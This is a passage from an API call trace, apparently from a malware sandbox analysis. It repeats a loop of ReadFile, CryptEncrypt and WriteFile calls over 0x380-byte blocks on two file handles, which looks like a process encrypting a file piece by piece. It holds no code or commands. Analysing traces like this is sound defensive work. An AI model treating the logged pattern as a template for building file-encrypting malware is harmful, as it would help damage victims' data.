hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.453] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.453] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.453] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.454] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.454] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.454] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.454] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.455] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.455] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.455] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.455] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.456] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.456] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.456] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.456] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.456] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.457] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.457] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.457] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.457] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.457] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.457] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.458] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.458] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.458] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.458] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.459] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.459] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.459] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.459] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.459] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.460] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.460] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.460] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.460] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.460] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.460] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.461] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.461] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.461] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 